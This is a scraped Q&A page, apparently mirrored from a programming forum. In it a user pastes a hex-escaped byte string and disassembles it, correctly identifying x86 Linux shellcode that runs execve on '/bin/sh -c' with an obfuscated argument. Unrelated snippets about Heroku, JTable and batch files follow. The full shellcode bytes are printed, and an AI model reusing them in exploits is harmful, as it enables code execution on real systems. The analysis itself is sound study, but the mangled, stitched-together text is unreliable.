linux - what is hex version of a command , what does it mean in reality , how is this done -

-

i have noticed command in form of hex characters , says hex version of command (linux) , mean hex version , how can convert human readable form . of know :

  • \ : escape sequence
  • x : stands hex

the command listed below...

"\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68" "\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99" "\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7" "\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56" "\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31" "\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69" "\x6e\x2f\x73\x68\x00\x2d\x63\x00"

but how can convert original command in english "xxxxxxxx " .

i took binary , ran through hexdump -vc , objdump:

$ objdump -b binary -m i386 -d output   output:     file format binary   disassembly of section .data:  00000000 <.data>:    0:   eb 3e                   jmp    0x40    2:   5b                      pop    %ebx    3:   31 c0                   xor    %eax,%eax    5:   50                      push   %eax    6:   54                      push   %esp    7:   5a                      pop    %edx    8:   83 ec 64                sub    $0x64,%esp    b:   68 ff ff ff ff          push   $0xffffffff   10:   68 df d0 df d9          push   $0xd9dfd0df   15:   68 8d 99 df 81          push   $0x81df998d   1a:   68 8d 92 df d2          push   $0xd2df928d   1f:   54                      push   %esp   20:   5e                      pop    %esi   21:   f7 16                   notl   (%esi)   23:   f7 56 04                notl   0x4(%esi)   26:   f7 56 08                notl   0x8(%esi)   29:   f7 56 0c                notl   0xc(%esi)   2c:   83 c4 74                add    $0x74,%esp   2f:   56                      push   %esi   30:   8d 73 08                lea    0x8(%ebx),%esi   33:   56                      push   %esi   34:   53                      push   %ebx   35:   54                      push   %esp   36:   59                      pop    %ecx   37:   b0 0b                   mov    $0xb,%al   39:   cd 80                   int    $0x80   3b:   31 c0                   xor    %eax,%eax   3d:   40                      inc    %eax   3e:   eb f9                   jmp    0x39   40:   e8 bd ff ff ff          call   0x2   45:   2f                      das       46:   62 69 6e                bound  %ebp,0x6e(%ecx)   49:   2f                      das       4a:   73 68                   jae    0xb4   4c:   00                      .byte 0x0   4d:   2d                      .byte 0x2d   4e:   63 00                   arpl   %ax,(%eax)     ... $ hexdump -vc output  00000000  eb 3e 5b 31 c0 50 54 5a  83 ec 64 68 ff ff ff ff  |.>[1.ptz..dh....| 00000010  68 df d0 df d9 68 8d 99  df 81 68 8d 92 df d2 54  |h....h....h....t| 00000020  5e f7 16 f7 56 04 f7 56  08 f7 56 0c 83 c4 74 56  |^...v..v..v...tv| 00000030  8d 73 08 56 53 54 59 b0  0b cd 80 31 c0 40 eb f9  |.s.vsty....1.@..| 00000040  e8 bd ff ff ff 2f 62 69  6e 2f 73 68 00 2d 63 00  |...../bin/sh.-c.| 00000050  00                                                |.| 00000051

it kind of program. first jumps offset 0x40 , uses call 0x2 set stack up; bunch of operations including system call. program data appears start @ offset 0x45 , contains string "/bin/sh -c".

the system call in question #11 (mov $0xb,%al), according this table sys_execve. i'd guess it's trying run shell. code intended exploit buffer overflows?


Comments

Post a Comment

Popular posts from this blog

java - Run a .jar on Heroku -

-
i trying run .jar file on heroku, , can't find instructions anywhere on how this. have read wants me compile uploading heroku. possible, , if is, how this? if helps, trying run minecraft craftbukkit server, , don't have pom.xml file yet. you didn't provide details i'll try give , people reaches question way it. first of all, create heroku account , create heroku application (assumed have done that). second, need generate application jar , upload heroku. so, open terminal , install heroku cli (assuming unix terminal): $ sudo npm install -g heroku-cli you need have npm , nodejs installed, can check link: https://www.digitalocean.com/community/tutorials/how-to-install-node-js-on-ubuntu-16-04 once done that, can use npm update node version acceptable heroku-cli: $ sudo npm install -g n $ sudo n 7.10.0 and run: $ sudo npm install -g heroku-cli in order deploy jars, need install deploy plugin: $ sudo heroku plugins:install heroku-cli-deploy ...
Read more

java - Jtable duplicate Rows -

-
Image
when add new rows in jtable duplicate rows many times this method update jtable public final void tableaucomande(){ ((defaulttablemodel)tabcommande.getmodel()).getdatavector().clear(); session s=hibernateutil.getsessionfactory().opensession(); criteria cr1= s.createcriteria(commande.class); list <commande> lcs=cr1.list() ; criteria cr2= s.createcriteria(lignecommande.class); list <lignecommande> lck=cr2.list() ; if(lcs.size()!=0 && lck.size()!=0) { (commande lc:lcs) { for(lignecommande lig:lck){ ((defaulttablemodel)tabcommande.getmodel()).addrow(new object[]{ lc.getid_cmd(),lc.getnumcmd(),lc.getdate_cmd(),lc.getclient().getnomprenom(), lig.getproduit().getlib_prd(),lig.getquantite(),lig.getproduit().getid_prd() }); } } // tabcommande.setrowselectioninterval(tabcommande.getrowcount()-1,tabcommande.getrowcount()-1); } } this code add add data rows displaye...
Read more

validation - How to pass paramaters like unix into windows batch file -

-
i need pass various parameters .cmd file unix format file.cmd -configuration=value -source=value -flag but, try this: startlocal @echo off cls setlocal set cmdline=%* set configuration= set source= set badargs= set validation= goto main :splitargs echo splitargs(%*) if "%*" neq "" ( /f "tokens=1,2,* delims== " %%i in ("%*") call :assignkeyvalue %%i %%j & call :splitargs %%k ) goto :eof :assignkeyvalue echo assignkeyvalue(%1, %2) if /i %1==-configuration ( set configuration=%2 ) else if /i %1==-source ( set source=%2 ) else ( rem append unrecognised [key,value] badargs echo unknown key %1 set badargs=%badargs%[%1, %2] ) goto :eof :validate echo validating set validation=fail if defined configuration ( echo -configuration ok if defined source ( echo -source ok if not defined badargs ( set validation=success ) ) ) goto :eof :main cl...
Read more